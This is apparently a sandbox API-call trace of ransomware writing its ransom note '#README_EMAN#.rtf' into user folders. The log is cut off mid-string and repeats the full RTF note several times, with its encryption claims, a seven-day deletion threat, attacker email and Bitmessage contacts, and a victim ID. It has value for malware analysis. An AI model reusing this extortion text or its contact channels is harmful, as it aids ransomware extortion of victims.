that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x24866c8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\";ÞÒ\x18\x06ýoÏ»Qò\x1bß°ÞbÜØ\x8f\x8cÍ|\x03\r", lpUsedDefaultChar=0x0) returned 8717 [0298.993] WriteFile (in: hFile=0x27c, lpBuffer=0x24866c8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x24866c8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0298.994] CloseHandle (hObject=0x27c) returned 1 [0298.994] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\or-in\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\or-in\\#readme_eman#.rtf")) returned 0xffffffff [0298.994] GetLastError () returned 0x2 [0298.994] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\or-in\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\or-in\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0298.995] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0298.995] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 